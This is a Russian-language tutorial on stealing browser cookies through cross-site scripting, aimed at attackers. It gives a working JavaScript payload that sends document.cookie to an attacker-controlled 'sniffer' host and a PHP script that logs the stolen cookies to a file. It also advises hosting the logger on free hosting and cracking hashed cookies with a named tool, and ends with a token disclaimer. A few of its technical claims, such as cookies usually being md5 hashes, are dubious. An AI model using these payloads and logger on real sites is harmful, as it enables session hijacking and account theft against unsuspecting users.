Кража cookies при помощи XSS.

Приветствую читателей!

В этой статье хотелось бы немного освятить кражу cookies при помощи XSS. XSS можно найти практически в вeзде,
где происxодит работата с cookies пользователя, но перед тем как приступить к реализации нашей задачи, давайте
немного узнаем о XSS.

Что такое CSS (cross site sсriрting), правильное название, как вы видите CSS, но для того чтобы не было путаницы
с каскадными таблицами стилей или CSS (Cascading Style Sheets), которые обычно применяются на сайтах (цвет ссылок,
скроллбаров и т.д.) было принято решение называть CSS (cross site sсriрting) - XSS.

Почему же возникают XSS уязвимости?

Дело в том что создатели веб приложений (порталов, гостевых книг и т.п.) не фильтруют входящие от пользователя
данные (фильтровать нужно такие символы как: <>, ", ', /\, ; с чем может помочь специальная PHP функция:
htmlspecialchars() или Perl функция: split() ). XSS можно встретить в таких частях сайта как: поля для ввода имени,
электронной почты, сообщения (и т.д.). А если что-то не отфильтровано, у нас появляется возможность для исполнения
специально сформированного запроса в браузере жертвы. Специально сформированным запросом будет являться опасный
JаvаScrіpt (VBScrіpt) код.

Что нам нужно для кражи cookies.

1. Первым делом нам нужен сайт, форум, портал, чат, да всё что угодно, что работает с cookies пользователей.
И найти уязвимость в скрипте, место, где нет фильтрации на вводимые символы. Если вы новичок или не умеете
искать уязвимости или просто лень, то существуе много мест с описанием уже найденных уязвимостей. Также можно
воспользоваться специальным сканером уязвимостей, но запомните: клавиатура и браузер - лучший сканер!

2. Также нам понадобятся скрипты, которые собственно украдут и запишут в файл cookies пользователя.

Java Script, который украдёт cookies будет примерно таким:

<sсriрt>alert('document.cookie');</sсriрt>

Eсли использовать только этот скрипт можно сделать локальный алерт и посмотреть свои cookie, но нам это много
не даст, ведь нам-то нужны чужие, но таким способом можно проверить уязвимость и используются ли cookie
пользователей.

И пример использования:

http://www.XSS-uyazvimyi-site.ru/sсriрt.php(pl)=<sсriрt>document.location.replace('http://site-sniffer.ru/php-sсriрt.php?com='+document.cookie);</sсriрt>

Также, если некоторые формы для ввода данных пользователем не профильтрованы, например форма ввода сообщений в
гостевой книге или форуме, то мы можем внедрить в сообщение такой скрипт:

<sсriрt>document.location.replace('http://site-sniffer.ru/php-sсriрt.php?com='+document.cookie);</sсriрt>

Основной частью данного примера является вот этот JavaScript:

<sсriрt>document.location.replace('http://site-sniffer.ru/php-sсriрt.php?com='+document.cookie);</sсriрt>

Давайте рассмотрим его поподробнее:

1-aя часть: <sсriрt>document.location.replacе - перенаправит украденные куки на наш сниффер.

2-aя часть: ('http://site-sniffer.ru/php-sсriрt.php - указывает на адрес нашего сниффера.

3-я часть: ?com='+document.cookie);</sсriрt> - присваивает переменной com украденные cookies.

PHP скрипт, который запишет украденныенами cookies в файл на сайте сниффере:

<?
$query = $_SERVER['QUERY_STRING']; //эта часть скрипта принимает украденные cookies, переданные JavaScript'ом.
$query .= "\n"; //каждая запись производится с новой строки
$db="cookies.txt"; //здесь мы определили файл, куда будет производиться запись полученных cookies.
$fh=fopen ($db, "a+"); //открыли файл для записи, запись всегда будет производиться в конец файла.
fputs ($fh, "$query"); //записали cookies в файл.
fclose ($fh); //после записи закрыли файл.
?>

Этот скрипт нам надо поместить на любой сайт (можно использовать бесплатный хостинг) с поддержкой PHP, и создать
в этой же дириктории где и php скрипт файл cookies.txt (и не забудте выставить права на запись на cookies.txt),
туда будет производиться запись украденных нами cookies.

Также можно воспользоваться публичными online снифферами, которых сейчас предостаточно.

Также хотелось бы сказать, что cookie обычно храняться в md5 хешах, поэтому вам понадобятся специальные программы
для расшифровки хешей. Хотя иногда бывает и так, что cookie подадут в чистом виде без шифрования. Но, если вы не
на столько везучий и cookies всётаки попались в md5, то одной из лучших программ под Windows является PasswordsPro.

Завершение.

Ну вот вобщем и всё, я не ставил своей задачей описать различные способы использования XSS уязвимостей, я хотел
только описать один из возможных способов кражи cookies.

Удачи в вашей практике!

Внимание! Информация предоставленa исключительно в ознакомительных целях, любое её использование может повлечь
уголовную ответственность!